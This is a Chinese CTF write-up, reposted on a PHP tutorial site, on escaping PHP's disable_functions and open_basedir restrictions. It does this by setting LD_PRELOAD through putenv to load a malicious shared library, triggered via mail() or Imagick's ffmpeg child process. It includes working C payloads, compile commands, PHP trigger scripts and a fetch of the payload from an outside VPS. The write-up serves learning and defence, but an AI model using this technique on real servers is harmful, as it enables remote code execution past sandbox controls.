首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

phpmailldpreload,深入浅出LD_PRELOADputenv()

作者:小dej_531 | 来源:互联网 | 2023-10-12 18:59
前记上周利用空余时间,做了一下0ctf,感觉这道bypassdisablefunction的题目比较有趣,于是分析一下,有了

175403

前记

上周利用空余时间,做了一下0ctf,感觉这道bypass disable function的题目比较有趣,于是分析一下,有了此文

题目分析

拿到题目

Imagick is a awesome library for hackers to break `disable_functions`.

So I installed php-imagick in the server, opened a `backdoor` for you.

Let's try to execute `/readflag` to get the flag.

Open basedir: /var/www/html:/tmp/d4dabdbc73b87e364e29e60c60a92900

Hint: eval($_POST["backdoor"]);

题目给了3个信息:

execute /readflag to get the flag

Open basedir: /var/www/html:/tmp/d4dabdbc73b87e364e29e60c60a92900

Hint: eval($_POST[“backdoor”]);

我们知道题目是有后门的,但是有disable_functions限制,所以我们首先查看一下phpinfo内容

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail

过滤非常多,但思路非常清晰:

1.bypass open basedir

2.bypass disable functions

3.execute readflag

open basedir

我们做个简单的测试

php > ini_set('open_basedir','/var/www/html');

php > var_dump(scandir('/var/www/html'));

array(5) {

[0]=>

string(1) "."

[1]=>

string(2) ".."

[2]=>

string(7) "hack.so"

[3]=>

string(10) "index.html"

[4]=>

string(23) "index.nginx-debian.html"

}

php > var_dump(scandir('/tmp'));

bool(false)

即open basedir是用来限制访问目录的,我们看一下题目源代码

backdoor=readfile('index.php');

可以得到

$dir = "/tmp/" . md5("$_SERVER[REMOTE_ADDR]");

mkdir($dir);

ini_set('open_basedir', '/var/www/html:' . $dir);

?>

Imagick is a awesome library for hackers to break `disable_functions`.

So I installed php-imagick in the server, opened a `backdoor` for you.

Let's try to execute `/readflag` to get the flag.

Open basedir:

Hint: eval($_POST["backdoor"]);

题目也是使用了这样的限制,我们只能访问

/tmp/md5("$_SERVER[REMOTE_ADDR]);

/var/www/html

那么如何bypass open basedir与disable functions呢这里不难搜到这样一篇文章

https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/

文中提及,我们可以用LD_PRELOAD+putenv打一套组合拳,既能绕过open basedir,又能绕过disable functions

LD_PRELOAD与putenv

这里我们先来看一下原理,首先什么是LD_PRELOAD?

google给出如下定义

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

即LD_PRELOAD这个环境变量指定路径的文件,会在其他文件被调用前,最先被调用

而putenv可以设置环境变量

putenv ( string $setting ) : bool

添加 setting 到服务器环境变量。 环境变量仅存活于当前请求期间。 在请求结束时环境会恢复到初始状态。

同时该函数也未被过滤。那么我们可以有如下骚操作:

1.制作一个恶意shared libraries

2.使用putenv设置LD_PRELOAD为恶意文件路径

3.使用某个php函数,触发specific shared library

4.成功进行RCE

175403

而既然要在php运行时被触发,那么势必选择一个非常常用的函数才行

那么怎么找到这个函数呢?

传统方式(hijacking function)

在已有的文章中显示,一般使用phpmail()函数进行触发,我们简单分析一下

这里简单写个demo

mail('','','','');

?>

我们strace一下,可以看到运行这个脚本的时候,程序会启子进程来调用sendmail

execve("/usr/bin/php", ["php", "test.php"], [/* 20 vars */]) = 0

[pid 23864] execve("/bin/sh", ["sh", "-c", "/usr/sbin/sendmail -t -i "], [/* 20 vars */]) = 0

[pid 23865] execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-t", "-i"], [/* 20 vars */]) = 0

那么我们只要看一下sendmail使用了哪些函数

175403

有很多函数可以使用,这里可以选择geteuid(),然后我们编写自己的evil shared libraries:hack.c

#include

#include

#include

void payload() {

system("ls / > /tmp/sky");

}

int geteuid()

{

if (getenv("LD_PRELOAD") == NULL) { return 0; }

unsetenv("LD_PRELOAD");

payload();

}

然后编译一下

gcc -c -fPIC hack.c -o hack

gcc --share hack -o hack.so

然后我们运行脚本

putenv("LD_PRELOAD=./hack.so");

mail('','','','');

?>

175403

不难发现它执行了命令,然后可以发现/tmp目录下多了一个文件sky

root@sky:~# ls /tmp | grep sky

sky

我们查看一下

root@sky:~# cat /tmp/sky

bin

boot

dev

etc

home

lib

lib32

....

发现成功执行命令

改进版(hijack shared library)

但其实这个方法是将条件变得严苛了,我们干的事情局限于找到一个函数,然后对其进行注入

但实际上我们可以更加直接,我们先将sendmail进行删除

175403

如图所示现在已经没有了sendmail,但我们依旧可以进行rce,可使用如下文件sky.c

#define _GNU_SOURCE

#include

#include

#include

__attribute__ ((__constructor__)) void angel (void){

unsetenv("LD_PRELOAD");

system("ls");

}

其中__attribute__ ((__constructor__))有如下说明

1.It's run when a shared library is loaded, typically during program startup.

2.That's how all GCC attributes are; presumably to distinguish them from function calls.

3.The destructor is run when the shared library is unloaded, typically at program exit.

所以当我们最开始将evil shared library load上后,就会触发__attribute__ ((__constructor__)),从而达成我们rce的目的.

函数寻找

但本题中mail函数已被disable_functions限制,所以我们并不能按照上述模式进行攻击。那么我们要找到一个什么样的函数才能满足我们的条件呢?

从上述内容不难发现,我们必须找到一个能在运行时候启动子进程的函数才行,因为我们设置了环境变量,必须restart才能生效,所以如果能启动一个子进程,那么我们的设置的LD_PRELOAD就会加载我们的evil shared library.

这里我们发现题目提示

So I installed php-imagick in the server, opened a `backdoor` for you.

所以我们主要探究php-imagick到底能不能干类似的事情

我们阅读php-imagick源码

https://github.com/ImageMagick/ImageMagick

我们发现如下对应关系

175403

我们发现当文件是MPEG format时,程序会调用’ffmpeg’ program进行转换,而如下后缀都被认为成MPEG format

175403

我们测试一下.wmv

写出脚本

$img = new Imagick('sky.wmv');

?>

我们测试一下

execve("/usr/bin/php", ["php", "sky.php"], [/* 21 vars */]) = 0

[pid 25217] execve("/bin/sh", ["sh", "-c", ""ffmpeg" -v -1 -i "/tmp/magick-2"...], [/* 21 vars */]) = 0

可以发现的确成功启动了子进程,调用了ffmpeg

但是如果sky.wmv文件不存在时

execve("/usr/bin/php", ["php", "sky.php"], [/* 21 vars */]) = 0

则不会调用ffmpeg

所以也不难分析出,应该是有一步判断文件是否存在的操作,再会去进行调用相关程序进行解码转换的操作

所以如果想利用Imagick新起子进程,那么我们得先有后面的参数文件,当然这并不是什么难事。

payload & attack

那么只剩最后的攻击了,找到了可以起子进程的方式,只差构造evil shared library了

我们还是用之前的sky.c

#define _GNU_SOURCE

#include

#include

#include

__attribute__ ((__constructor__)) void angel (void){

unsetenv("LD_PRELOAD");

system("ls");

}

然后编译一下

gcc -c -fPIC sky.c -o sky

gcc --share sky -o sky.so

测试一下

putenv("LD_PRELOAD=./sky.so");

$img = new Imagick('sky.wmv');

?>

运行发现

root@sky:~# php sky.php

bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 lost+found media mnt opt proc root run sbin srv sys test tmp usr var vmlinuz vmlinuz.old

PHP Fatal error: Uncaught ImagickException: unable to open image `/tmp/magick-25528VpF8npGTawCz.pam': No such file or directory @ error/blob.c/OpenBlob/2712 in /root/sky.php:3

Stack trace:

#0 /root/sky.php(3): Imagick->__construct('sky.wmv')

#1 {main}

thrown in /root/sky.php on line 3

我们成功的进行了列目录

getflag

那么现在思路很清晰:

1.把我们的sky.so和sky.wmv上传到题目的/tmp/sandbox中

2.利用backdoor运行sky.php

3.在tmp目录读取重定向的结果

首先我们按照题目意思,调用/readflag

文件内容为

#define _GNU_SOURCE

#include

#include

#include

__attribute__ ((__constructor__)) void angel (void){

unsetenv("LD_PRELOAD");

system("/readflag > /tmp/d4dabdbc73b87e364e29e60c60a92900/flag");

}

然后是上传文件,我们有很多种方法,这里可以使用

$upload = '/tmp/d4dabdbc73b87e364e29e60c60a92900/sky.so';

echo copy("http://vps_ip/sky.wmv", $upload);

175403

我们可以看到上传成功了

然后我们执行

putenv("LD_PRELOAD=/tmp/d4dabdbc73b87e364e29e60c60a92900/sky.so");

$img = new Imagick('/tmp/d4dabdbc73b87e364e29e60c60a92900/sky.wmv');

175403

可以看到flag已经打到了/tmp目录下

我们进行读取即可

175403

后记

这个题目还是比较有趣的,学习到了不少姿势~

参考链接



推荐阅读
  • io

    当unique验证运到图片上传时

    当unique验证运到图片上传时
    2019独角兽企业重金招聘Python工程师标准model:public$imageFile;publicfunctionrules(){return[[[na ... [详细]
  • int

    Android中解析XML文件的实践指南

    Android中解析XML文件的实践指南
    本文详细介绍了在Android应用开发中解析XML文件的方法,包括从本地文件和网络资源获取XML文件的不同途径,以及使用DOM、SAX和PULL三种解析方式的具体实现。 ... [详细]
  • int

    PHP 实现多级树形结构:构建无限层级分类系统

    PHP 实现多级树形结构:构建无限层级分类系统
    在众多管理系统中,如菜单、分类和部门等模块,通常需要处理层级结构。为了高效管理和展示这些层级数据,本文将介绍如何使用 PHP 实现多级树形结构,并提供代码示例以帮助开发者轻松实现无限分级。 ... [详细]
  • int

    Determining if a String Contains Only English Characters

    This article explains how to check if a given string consists solely of English characters, including letters and numbers. It provides a practical PHP function for this purpose. ... [详细]
  • int

    Nginx 配置反向代理至本地 Docker 容器

    本文探讨如何配置 Nginx 以将传入请求反向代理到运行在本地绑定端口上的 Docker 容器,并解决常见的路径重定向问题。 ... [详细]
  • io

    Mathematica 12.3.1 中英文版正式发布,附新功能介绍

    历经三十年的开发,Mathematica 已成为技术计算领域的标杆,为全球的技术创新者、教育工作者、学生及其他用户提供了一个领先的计算平台。最新版本 Mathematica 12.3.1 增加了多项核心语言、数学计算、可视化和图形处理的新功能。 ... [详细]
  • dll

    利用MySQL弱口令获取系统权限的实战案例

    本文详细介绍了一种通过MySQL弱口令漏洞在Windows操作系统上获取SYSTEM权限的方法。该方法涉及使用自定义UDF DLL文件来执行任意命令,从而实现对远程服务器的完全控制。 ... [详细]
  • io

    前端开发:使用JavaScript获取最近7天、半年和一年的日期格式化方法

    本文介绍了如何在React和React Native项目中使用JavaScript进行日期格式化,提供了获取近7天、近半年及近一年日期的具体实现方法。 ... [详细]
  • int

    解决Classic ASP与PHP HMAC_SHA256哈希结果不一致的问题

    本文探讨了如何在Classic ASP中实现与PHP的hash_hmac('SHA256', $message, pack('H*', $secret))函数等效的哈希生成方法。通过分析不同实现方式及其产生的差异,提供了一种使用Microsoft .NET Framework的解决方案。 ... [详细]
  • process

    PHP 实现无刷新多图上传及远程图片处理

    PHP 实现无刷新多图上传及远程图片处理
    本文详细介绍了如何使用 PHP 实现网页上的无刷新多图上传功能,同时支持远程图片的下载与处理。文章提供了具体的代码示例,并对关键函数进行了说明。 ... [详细]
  • io

    ReactJS 计算器应用:增加功能

    本文将指导如何向ReactJS计算器应用添加必要的功能,使其能够响应用户操作并正确计算数学表达式。 ... [详细]
  • int

    解析与执行JavaScript中的字符串代码

    本文探讨了在JavaScript中执行字符串形式代码的多种方法,包括使用eval()函数以及跨页面调用的方法。同时,文章详细介绍了JavaScript中字符串的各种常用方法及其应用场景。 ... [详细]
  • grid

    如何在Kendo UI for jQuery中将行标题显示为可点击链接

    本文详细介绍了如何在Kendo UI for jQuery的数据管理组件中,将行标题字段呈现为锚点(即可点击链接),帮助开发人员更高效地实现这一功能。通过具体的代码示例和解释,即使是新手也能轻松掌握。 ... [详细]
  • io

    微信小程序:授权登录与手机号绑定

    微信小程序:授权登录与手机号绑定
    本文详细介绍了微信小程序中用户授权登录及绑定手机号的流程,结合官方指引和实际开发经验,提供了一套完整的实现方案,帮助开发者更好地理解和应用。 ... [详细]
  • io

    深入解析JavaScript数组的创建与常用方法

    JavaScript中的数组是数据集合的核心结构之一,内置了多种实用的方法。掌握这些方法不仅能提高开发效率,还能显著提升代码的质量和可读性。本文将详细介绍数组的创建方式及常见操作方法。 ... [详细]
author-avatar
小dej_531
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有